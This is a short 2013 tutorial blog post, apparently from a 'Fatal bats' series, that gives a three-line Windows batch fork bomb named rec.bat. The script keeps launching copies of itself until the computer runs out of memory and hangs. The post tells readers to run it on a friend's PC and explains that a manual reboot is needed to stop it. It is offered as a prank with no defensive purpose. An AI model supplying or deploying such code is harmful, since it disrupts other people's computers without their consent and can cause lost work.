- Back to Home »
- batch programming , Fatal bats , Tutorials »
- Fatal bats 2
Posted by : Unknown
Friday, 2 August 2013
Today lets try another deadly batch program,its a simple recursive batch that keeps on calling itself until the computer runs out of memory and finally hangs,
code:
:loop
start rec.bat
goto loop
copy the above code and save it as "rec.bat" remember,the name is also important so,better don't change it.
and now execute it in your friends pc,thats it!
Explanation:
- :loop -indicates the start of a looping statement
- start rec.bat -instructs the dos to start up "rec.bat" in another instance
- goto loop -again go back to the starting of the loop statement
- To stop it you need to manually reboot your system,
- advantages of this file over the previous,is this method you need not clean up the mess after reboot,because no copies of the file are created,
for futhur modifications check out the attachments section or the fatal bats series